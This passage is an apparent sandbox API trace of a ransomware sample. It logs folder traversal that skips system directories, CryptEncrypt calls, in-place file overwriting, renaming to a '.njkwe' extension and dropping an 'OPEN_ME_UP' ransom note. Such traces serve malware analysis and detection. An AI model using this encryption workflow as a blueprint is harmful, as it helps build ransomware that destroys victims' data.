nFileSizeHigh=0x0, nFileSizeLow=0x4958, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 1 [0061.908] lstrcmpiW (lpString1="SetupResources.dll", lpString2="Windows") returned -1 [0061.909] lstrcmpiW (lpString1="SetupResources.dll", lpString2="$Recycle.bin") returned 1 [0061.909] lstrcmpiW (lpString1="SetupResources.dll", lpString2="System Volume Information") returned -1 [0061.909] lstrcmpiW (lpString1="SetupResources.dll", lpString2="Program Files") returned 1 [0061.909] lstrcmpiW (lpString1="SetupResources.dll", lpString2="Program Files (x86)") returned 1 [0061.909] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\2070\\SetupResources.dll") returned 49 [0061.909] StrStrIW (lpFirst="SetupResources.dll", lpSrch=".njkwe") returned 0x0 [0061.909] lstrcmpW (lpString1="SetupResources.dll", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0061.909] lstrcmpW (lpString1="SetupResources.dll", lpString2="taridd") returned -1 [0061.909] StrCmpNW (lpStr1="\\\\?\\C:\\588bce7c90097ed212\\2070\\SetupResources.dll", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0061.909] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\2070\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\2070\\setupresources.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x42c [0061.909] GetTickCount () returned 0x114fe76 [0061.909] GetTickCount () returned 0x114fe76 [0061.909] GetTickCount () returned 0x114fe76 [0061.909] GetTickCount () returned 0x114fe76 [0061.909] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380f730*, pdwDataLen=0x380f7e0*=0x2c, dwBufLen=0x80 | out: pbData=0x380f730*, pdwDataLen=0x380f7e0*=0x80) returned 1 [0061.909] GetProcessHeap () returned 0xbe0000 [0061.909] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc43ec0 [0061.909] ReadFile (in: hFile=0x42c, lpBuffer=0xc43ec0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0xc43ec0*, lpNumberOfBytesRead=0x380f7e4*=0x2800, lpOverlapped=0x0) returned 1 [0061.911] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0061.911] WriteFile (in: hFile=0x42c, lpBuffer=0xc43ec0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0xc43ec0*, lpNumberOfBytesWritten=0x380f7e4*=0x2800, lpOverlapped=0x0) returned 1 [0061.911] GetProcessHeap () returned 0xbe0000 [0061.911] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc43ec0 | out: hHeap=0xbe0000) returned 1 [0061.911] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0061.911] WriteFile (in: hFile=0x42c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380f7e4*=0x300, lpOverlapped=0x0) returned 1 [0061.912] WriteFile (in: hFile=0x42c, lpBuffer=0x380f730*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0x380f730*, lpNumberOfBytesWritten=0x380f7e4*=0x80, lpOverlapped=0x0) returned 1 [0061.912] WriteFile (in: hFile=0x42c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380f7e4*=0x4, lpOverlapped=0x0) returned 1 [0061.912] CloseHandle (hObject=0x42c) returned 1 [0061.913] GetProcessHeap () returned 0xbe0000 [0061.913] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc0e158 [0061.913] wnsprintfW (in: pszDest=0xc0e158, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\2070\\SetupResources.dll_r00t_{3sXlE5}.njkwe") returned 69 [0061.913] MoveFileW (lpExistingFileName="\\\\?\\C:\\588bce7c90097ed212\\2070\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\2070\\setupresources.dll"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\2070\\SetupResources.dll_r00t_{3sXlE5}.njkwe" (normalized: "c:\\588bce7c90097ed212\\2070\\setupresources.dll_r00t_{3sxle5}.njkwe")) returned 1 [0061.914] GetProcessHeap () returned 0xbe0000 [0061.914] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc0e158 | out: hHeap=0xbe0000) returned 1 [0061.914] FindNextFileW (in: hFindFile=0xc19f60, lpFindFileData=0x380f820 | out: lpFindFileData=0x380f820*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4958, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 0 [0061.914] FindClose (in: hFindFile=0xc19f60 | out: hFindFile=0xc19f60) returned 1 [0061.914] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\2070\\---==%$$$OPEN_ME_UP$$$==---.txt") returned 62 [0061.914] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\2070\\---==%$$$OPEN_ME_UP$$$==---.txt" (normalized: "c:\\588bce7c90097ed212\\2070\\---==%$$$open_me_up$$$==---.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0061.914] WriteFile (in: hFile=0x428, lpBuffer=0x406478*, nNumberOfBytesToWrite=0x351, lpNumberOfBytesWritten=0x380f7ec, lpOverlapped=0x0 | out: lpBuffer=0x406478*, lpNumberOfBytesWritten=0x380f7ec*=0x351, lpOverlapped=0x0) returned 1 [0061.915] CloseHandle (hObject=0x428) returned 1 [0061.915] GetProcessHeap () returned 0xbe0000 [0061.915] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc27a58 | out: hHeap=0xbe0000) returned 1 [0061.915] FindNextFileW (in: hFindFile=0xc1a060, lpFindFileData=0x380faa8 | out: lpFindFileData=0x380faa8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="3076", cAlternateFileName="")) returned 1 [0061.915] lstrcmpiW (lpString1="3076", lpString2="Windows") returned -1 [0061.915] lstrcmpiW (lpString1="3076", lpString2="$Recycle.bin") returned 1 [0061.915] lstrcmpiW (lpString1="3076", lpString2="System Volume Information") returned -1 [0061.915] lstrcmpiW (lpString1="3076", lpString2="Program Files") returned -1 [0061.915] lstrcmpiW (lpString1="3076", lpString2="Program Files (x86)") returned -1 [0061.915] wnsprintfW (in: pszDest=0xc263f8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\3076") returned 30 [0061.915] lstrcmpW (lpString1="3076", lpString2=".") returned 1 [0061.915] lstrcmpW (lpString1="3076", lpString2="..") returned 1 [0061.915] lstrcmpW (lpString1="\\\\?\\C:\\588bce7c90097ed212\\3076", lpString2="C:\\Users\\FD1HVy\\Desktop") returned -1 [0061.915] GetProcessHeap () returned 0xbe0000 [0061.915] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc27a58 [0061.915] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\3076\\*") returned 32 [0061.915] FindFirstFileW (in: lpFileName="\\\\?\\C:\\588bce7c90097ed212\\3076\\*", lpFindFileData=0x380f820 | out: lpFindFileData=0x380f820*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName=".", cAlternateFileName="")) returned 0xc1a1a0 [0061.916] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0061.916] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0061.916] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0061.916] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0061.916] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0061.916] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\3076\\.") returned 32 [0061.916] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0061.916] FindNextFileW (in: hFindFile=0xc1a1a0, lpFindFileData=0x380f820 | out: lpFindFileData=0x380f820*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="..", cAlternateFileName="")) returned 1 [0061.916] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0061.916] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0061.916] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0061.916] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0061.916] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0061.916] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\3076\\..") returned 33 [0061.916] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0061.916] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0061.916] FindNextFileW (in: hFindFile=0xc1a1a0, lpFindFileData=0x380f820 | out: lpFindFileData=0x380f820*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x69d9e300, ftCreationTime.dwHighDateTime=0x1cac0d3, ftLastAccessTime.dwLowDateTime=0x69d9e300, ftLastAccessTime.dwHighDateTime=0x1cac0d3, ftLastWriteTime.dwLowDateTime=0x69d9e300, ftLastWriteTime.dwHighDateTime=0x1cac0d3, nFileSizeHigh=0x0, nFileSizeLow=0x18a5, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="eula.rtf", cAlternateFileName="")) returned 1 [0061.916] lstrcmpiW (lpString1="eula.rtf", lpString2="Windows") returned -1 [0061.916] lstrcmpiW (lpString1="eula.rtf", lpString2="$Recycle.bin") returned 1 [0061.916] lstrcmpiW (lpString1="eula.rtf", lpString2="System Volume Information") returned -1 [0061.916] lstrcmpiW (lpString1="eula.rtf", lpString2="Program Files") returned -1 [0061.916] lstrcmpiW (lpString1="eula.rtf", lpString2="Program Files (x86)") returned -1 [0061.916] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\3076\\eula.rtf") returned 39 [0061.916] StrStrIW (lpFirst="eula.rtf", lpSrch=".njkwe") returned 0x0 [0061.916] lstrcmpW (lpString1="eula.rtf", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0061.916] lstrcmpW (lpString1="eula.rtf", lpString2="taridd") returned -1 [0061.916] StrCmpNW (lpStr1="\\\\?\\C:\\588bce7c90097ed212\\3076\\eula.rtf", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0061.916] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\3076\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\3076\\eula.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x42c [0061.917] GetTickCount () returned 0x114fe76 [0061.917] GetTickCount () returned 0x114fe76 [0061.917] GetTickCount () returned 0x114fe76 [0061.917] GetTickCount () returned 0x114fe76 [0061.917] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380f730*, pdwDataLen=0x380f7e0*=0x2c, dwBufLen=0x80 | out: pbData=0x380f730*, pdwDataLen=0x380f7e0*=0x80) returned 1 [0061.917] GetProcessHeap () returned 0xbe0000 [0061.917] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc43ec0 [0061.917] ReadFile (in: hFile=0x42c, lpBuffer=0xc43ec0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0xc43ec0*, lpNumberOfBytesRead=0x380f7e4*=0x18a5, lpOverlapped=0x0) returned 1 [0061.918] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0xffffe75b, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0061.918] WriteFile (in: hFile=0x42c, lpBuffer=0xc43ec0*, nNumberOfBytesToWrite=0x18a5, lpNumberOfBytesWritten=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0xc43ec0*, lpNumberOfBytesWritten=0x380f7e4*=0x18a5, lpOverlapped=0x0) returned 1 [0061.918] GetProcessHeap () returned 0xbe0000 [0061.918] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc43ec0 | out: hHeap=0xbe0000) returned 1 [0061.918] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0061.919] WriteFile (in: hFile=0x42c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380f7e4*=0x300, lpOverlapped=0x0) returned 1 [0061.919] WriteFile (in: hFile=0x42c, lpBuffer=0x380f730*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0x380f730*, lpNumberOfBytesWritten=0x380f7e4*=0x80, lpOverlapped=0x0) returned 1 [0061.919] WriteFile (in: hFile=0x42c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380f7e4*=0x4, lpOverlapped=0x0) returned 1 [0061.919] CloseHandle (hObject=0x42c) returned 1 [0061.919] GetProcessHeap () returned 0xbe0000 [0061.919] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc0e158 [0061.919] wnsprintfW (in: pszDest=0xc0e158, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\3076\\eula.rtf_r00t_{3sXlE5}.njkwe") returned 59 [0061.920] MoveFileW (lpExistingFileName="\\\\?\\C:\\588bce7c90097ed212\\3076\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\3076\\eula.rtf"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\3076\\eula.rtf_r00t_{3sXlE5}.njkwe" (normalized: "c:\\588bce7c90097ed212\\3076\\eula.rtf_r00t_{3sxle5}.njkwe")) returned 1 [0061.921] GetProcessHeap () returned 0xbe0000 [0061.921] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc0e158 | out: hHeap=0xbe0000) returned 1 [0061.921] FindNextFileW (in: hFindFile=0xc1a1a0, lpFindFileData=0x380f820 | out: lpFindFileData=0x380f820*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5398dc00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x5398dc00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x5398dc00, ftLastWriteTime.dwHighDateTime=0x1cac6fe, nFileSizeHigh=0x0, nFileSizeLow=0xed90, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="LocalizedData.xml", cAlternateFileName="LOCALI~1.XML")) returned 1 [0061.921] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="Windows") returned -1 [0061.921] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="$Recycle.bin") returned 1 [0061.921] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="System Volume Information") returned -1 [0061.921] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="Program Files") returned -1 [0061.921] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="Program Files (x86)") returned -1 [0061.921] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\3076\\LocalizedData.xml") returned 48 [0061.921] StrStrIW (lpFirst="LocalizedData.xml", lpSrch=".njkwe") returned 0x0 [0061.921] lstrcmpW (lpString1="LocalizedData.xml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0061.922] lstrcmpW (lpString1="LocalizedData.xml", lpString2="taridd") returned -1 [0061.922] StrCmpNW (lpStr1="\\\\?\\C:\\588bce7c90097ed212\\3076\\LocalizedData.xml", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0061.922] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\3076\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\3076\\localizeddata.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x42c [0061.922] GetTickCount () returned 0x114fe76 [0061.922] GetTickCount () returned 0x114fe76 [0061.922] GetTickCount () returned 0x114fe76 [0061.922] GetTickCount () returned 0x114fe76 [0061.922] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380f730*, pdwDataLen=0x380f7e0*=0x2c, dwBufLen=0x80 | out: pbData=0x380f730*, pdwDataLen=0x380f7e0*=0x80) returned 1 [0061.922] GetProcessHeap () returned 0xbe0000 [0061.922] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc43ec0 [0061.922] ReadFile (in: hFile=0x42c, lpBuffer=0xc43ec0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0xc43ec0*, lpNumberOfBytesRead=0x380f7e4*=0x2800, lpOverlapped=0x0) returned 1 [0061.924] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0061.924] WriteFile (in: hFile=0x42c, lpBuffer=0xc43ec0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0xc43ec0*, lpNumberOfBytesWritten=0x380f7e4*=0x2800, lpOverlapped=0x0) returned 1 [0061.924] GetProcessHeap () returned 0xbe0000 [0061.924] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc43ec0 | out: hHeap=0xbe0000) returned 1 [0061.924] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0061.924] WriteFile (in: hFile=0x42c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380f7e4*=0x300, lpOverlapped=0x0) returned 1 [0061.925] WriteFile (in: hFile=0x42c, lpBuffer=0x380f730*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0x380f730*, lpNumberOfBytesWritten=0x380f7e4*=0x80, lpOverlapped=0x0) returned 1 [0061.925] WriteFile (in: hFile=0x42c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380f7e4*=0x4, lpOverlapped=0x0) returned 1 [0061.925] CloseHandle (hObject=0x42c) returned 1 [0061.927] GetProcessHeap () returned 0xbe0000 [0061.927] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc0e158 [0061.927] wnsprintfW (in: pszDest=0xc0e158, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\3076\\LocalizedData.xml_r00t_{3sXlE5}.njkwe") returned 68 [0061.927] MoveFileW (lpExistingFileName="\\\\?\\C:\\588bce7c90097ed212\\3076\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\3076\\localizeddata.xml"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\3076\\LocalizedData.xml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\588bce7c90097ed212\\3076\\localizeddata.xml_r00t_{3sxle5}.njkwe")) returned 1 [0061.927] GetProcessHeap () returned 0xbe0000 [0061.927] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc0e158 | out: hHeap=0xbe0000) returned 1 [0061.927] FindNextFileW (in: hFindFile=0xc1a1a0, lpFindFileData=0x380f820 | out: lpFindFileData=0x380f820*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x3758, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 1 [0061.927] lstrcmpiW (lpString1="SetupResources.dll", lpString2="Windows") returned -1 [0061.927] lstrcmpiW (lpString1="SetupResources.dll", lpString2="$Recycle.bin") returned 1 [0061.927] lstrcmpiW (lpString1="SetupResources.dll", lpString2="System Volume Information") returned -1 [0061.927] lstrcmpiW (lpString1="SetupResources.dll", lpString2="Program Files") returned 1 [0061.928] lstrcmpiW (lpString1="SetupResources.dll", lpString2="Program Files (x86)") returned 1 [0061.928] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\3076\\SetupResources.dll") returned 49 [0061.928] StrStrIW (lpFirst="SetupResources.dll", lpSrch=".njkwe") returned 0x0 [0061.928] lstrcmpW (lpString1="SetupResources.dll", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0061.928] lstrcmpW (lpString1="SetupResources.dll", lpString2="taridd") returned -1 [0061.928] StrCmpNW (lpStr1="\\\\?\\C:\\588bce7c90097ed212\\3076\\SetupResources.dll", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0061.928] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\3076\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\3076\\setupresources.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x42c [0061.928] GetTickCount () returned 0x114fe85 [0061.928] GetTickCount () returned 0x114fe85 [0061.928] GetTickCount () returned 0x114fe85 [0061.928] GetTickCount () returned 0x114fe85 [0061.928] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380f730*, pdwDataLen=0x380f7e0*=0x2c, dwBufLen=0x80 | out: pbData=0x380f730*, pdwDataLen=0x380f7e0*=0x80) returned 1 [0061.928] GetProcessHeap () returned 0xbe0000 [0061.928] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc43ec0 [0061.928] ReadFile (in: hFile=0x42c, lpBuffer=0xc43ec0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0xc43ec0*, lpNumberOfBytesRead=0x380f7e4*=0x2800, lpOverlapped=0x0) returned 1 [0061.930] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0061.930] WriteFile (in: hFile=0x42c, lpBuffer=0xc43ec0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0xc43ec0*, lpNumberOfBytesWritten=0x380f7e4*=0x2800, lpOverlapped=0x0) returned 1 [0061.930] GetProcessHeap () returned 0xbe0000 [0061.930] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc43ec0 | out: hHeap=0xbe0000) returned 1 [0061.930] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0061.930] WriteFile (in: hFile=0x42c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380f7e4*=0x300, lpOverlapped=0x0) returned 1 [0061.930] WriteFile (in: hFile=0x42c, lpBuffer=0x380f730*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0x380f730*, lpNumberOfBytesWritten=0x380f7e4*=0x80, lpOverlapped=0x0) returned 1 [0061.930] WriteFile (in: hFile=0x42c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380f7e4*=0x4, lpOverlapped=0x0) returned 1 [0061.931] CloseHandle (hObject=0x42c) returned 1 [0061.977] GetProcessHeap () returned 0xbe0000 [0061.977] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc0e158 [0061.977] wnsprintfW (in: pszDest=0xc0e158, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\3076\\SetupResources.dll_r00t_{3sXlE5}.njkwe") returned 69 [0061.977] MoveFileW (lpExistingFileName="\\\\?\\C:\\588bce7c90097ed212\\3076\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\3076\\setupresources.dll"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\3076\\SetupResources.dll_r00t_{3sXlE5}.njkwe" (normalized: "c:\\588bce7c90097ed212\\3076\\setupresources.dll_r00t_{3sxle5}.njkwe")) returned 1 [0061.977] GetProcessHeap () returned 0xbe0000 